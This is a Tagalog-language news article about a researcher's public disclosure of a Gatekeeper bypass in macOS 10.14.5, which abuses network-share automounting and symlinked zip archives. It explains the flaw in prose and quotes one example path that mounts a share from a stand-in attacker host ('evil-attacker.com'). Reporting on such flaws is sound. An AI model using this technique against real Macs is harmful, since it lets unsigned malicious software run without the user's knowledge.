Amaya Toman Ang security researcher na si Filippo Cavallarin ay nag-post ng babala tungkol sa bug sa macOS 10.14.5 sa kanyang blog. Ito ay binubuo sa posibilidad ng ganap na pag-bypass sa mga hakbang sa seguridad ng Gatekeeper. Ayon kay Cavallarin, itinuro niya ang error sa Apple noong Pebrero ng taong ito, ngunit hindi ito inayos ng kumpanya sa pinakabagong update.
Ang Gatekeeper ay binuo ng Apple at isinama sa desktop operating system nito sa unang pagkakataon noong 2012. Ito ay isang mekanismo na pumipigil sa isang application na tumakbo nang walang kaalaman at pahintulot ng user. Pagkatapos mong mag-download ng app, awtomatikong sinusuri ng Gatekeeper ang code nito upang makita kung ang software ay wastong nilagdaan ng Apple.
Maaaring ito ay interesado ka
Sa kanyang post sa blog, sinabi ni Cavallarin na ang Gatekeeper, bilang default, ay isinasaalang-alang ang parehong panlabas na imbakan at pagbabahagi ng network bilang mga secure na lokasyon. Anumang application na naninirahan sa mga target na ito ay maaaring awtomatikong ilunsad nang hindi kinakailangang dumaan sa tseke ng Gatekeeper. Ito ang tampok na ito na maaaring mapagsamantalahan upang ilunsad ang malisyosong software nang hindi nalalaman ng gumagamit.
Isang aspeto na nagbibigay-daan sa hindi awtorisadong pag-access ay ang automount feature, na nagbibigay-daan sa mga user na awtomatikong mag-mount ng network share sa pamamagitan lamang ng pagtukoy ng path na nagsisimula sa "/net/". Bilang halimbawa, binanggit ni Cavallarin ang landas na "ls /net/evil-attacker.com/sharedfolder/" na maaaring maging sanhi ng pag-load ng operating system ng mga nilalaman ng isang folder na "sharefolder" sa isang malayong lokasyon na maaaring potensyal na nakakahamak.
Maaari mong panoorin kung paano gumagana ang banta sa video:
Ang isa pang kadahilanan ay ang katotohanan na kung ang isang zip archive na naglalaman ng isang partikular na symlink na humahantong sa automount function ay ibinahagi, hindi ito susuriin ng Gatekeeper. Sa ganitong paraan, madaling mada-download ng biktima ang malisyosong archive at i-unzip ito, na nagpapahintulot sa umaatake na magpatakbo ng halos anumang software sa Mac nang hindi nalalaman ng user. Ang Finder, na nagtatago ng ilang partikular na extension bilang default, ay mayroon ding bahagi sa kahinaang ito.
Sinabi ni Cavallarin sa kanyang blog na binigyang pansin ng Apple ang kahinaan ng macOS operating system noong Pebrero 22 ng taong ito. Ngunit noong kalagitnaan ng Mayo, huminto ang Apple sa pakikipag-usap kay Cavallarin, kaya nagpasya si Cavallarin na isapubliko ang buong bagay.
Pinagmulan: FCVL
